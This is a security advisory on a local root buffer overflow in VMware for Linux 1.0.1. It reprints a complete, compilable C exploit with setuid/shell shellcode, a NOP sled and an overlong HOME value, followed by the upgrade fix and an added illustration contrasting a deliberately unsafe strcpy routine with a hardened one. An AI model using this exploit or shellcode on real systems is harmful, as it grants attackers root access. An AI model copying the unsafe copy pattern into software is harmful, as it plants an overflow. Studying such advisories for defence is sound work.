Vulnerability: VMware

Affected: VMware for Linux 1.0.1 and previous

Description:

The security hole allows an unprivileged local user to mount a buffer overrun attack against VMware for Linux and obtain root access to the machine. VMware v1.0.1 is a software product by VMware, Inc. that creates a virtual machine in which you can install multiple operating systems without repartitioning or formatting your hard drive.

Team Asylum has found multiple buffer overflows in VMware v1.0.1 for Linux. Earlier versions have the same buffer overflows. Any local user can exploit these overflows to gain root access.

funkySh posted the following code, which exploits the vulnerability (the original omitted the stdlib/string/unistd headers and used a non-standard `void main`; those have been corrected, the behaviour is unchanged):

```c
/*
 * VMware v1.0.1 root sploit
 * funkySh 02/07/99
 *
 * 1. Redhat 5.2 2.2.9 offset 800-1100
 * 2. offset 1600-2200
 * 1. Slackware 3.6 2.2.9 offset 0
 * 2. offset ?
 *
 * [ 1 - started from xterm on localhost ]
 * [ 2 - started from telnet, with valid display ]
 */
#include <stdio.h>
#include <stdlib.h>   /* atoi, setenv */
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */

char code[] =
    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"                         /* setuid(0) */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define BUFFER   1032
#define NOP      0x90
#define RET_ADDR 0xbfffdf50
#define PATH     "/usr/local/bin/vmware"

char buf[BUFFER];

int main(int argc, char *argv[])
{
    int i, offset = 0;

    if (argc > 1)
        offset = atoi(argv[1]);          /* optional adjustment of RET_ADDR */

    memset(buf, NOP, BUFFER);            /* NOP padding */
    memcpy(buf + 800, code, strlen(code));
    for (i = 854 + 2; i < BUFFER - 2; i += 4)
        *(int *)&buf[i] = RET_ADDR + offset;

    setenv("HOME", buf, 1);              /* the oversized HOME value is what overruns vmware's buffer */
    execl(PATH, "vmware", "-display", "127.0.0.1:0", (char *)0); /* change IP if required */
    return 0;
}
```

Solution:

All users are encouraged to upgrade to VMware v1.0.2. You may download it directly from http://www.vmware.com.
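As an added illustration (not part of the advisory and not VMware's code), the following C snippet places the unbounded-copy pattern that an oversized HOME value abuses beside a hardened form that validates the value before copying; the function names, buffer sizes and the `/.vmware/config` suffix are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define PATHBUF 256   /* hypothetical destination size */

/* Hypothetical vulnerable pattern (illustration only, not VMware's code):
 * an environment value is copied into a fixed stack buffer unchecked. */
int config_path_unsafe(const char *home, char *out, size_t outsz) {
    char tmp[64];
    strcpy(tmp, home);                 /* overruns tmp once home exceeds 63 bytes */
    strcat(tmp, "/.vmware/config");
    snprintf(out, outsz, "%s", tmp);
    return 0;
}

/* Hardened form: reject a value that is not an absolute path or would not
 * fit, then let snprintf bound the write. Returns 0 on success, -1 when
 * rejected. A set-uid program should go further and take the home directory
 * from getpwuid(getuid()) rather than HOME, since the caller controls it. */
int config_path_safe(const char *home, char *out, size_t outsz) {
    static const char suffix[] = "/.vmware/config";
    if (home == NULL || out == NULL || outsz == 0 || home[0] != '/')
        return -1;
    if (strlen(home) + sizeof suffix > outsz)   /* sizeof counts the NUL */
        return -1;
    if (snprintf(out, outsz, "%s%s", home, suffix) >= (int)outsz)
        return -1;
    return 0;
}

/* Self-check: a normal HOME is accepted and built correctly, while a
 * constructed 1032-byte value (the BUFFER size used in the exploit above)
 * and a relative path are rejected. Returns 1 when all three hold. */
int check_home_handling(void) {
    char out[PATHBUF];
    char big[1033];
    memset(big, 'A', 1032);
    big[0] = '/';
    big[1032] = '\0';
    return config_path_safe("/home/alice", out, sizeof out) == 0
        && strcmp(out, "/home/alice/.vmware/config") == 0
        && config_path_safe(big, out, sizeof out) == -1
        && config_path_safe("relative/dir", out, sizeof out) == -1;
}

int main(void) {
    printf("hardened HOME handling %s\n", check_home_handling() ? "ok" : "FAILED");
    return 0;
}
```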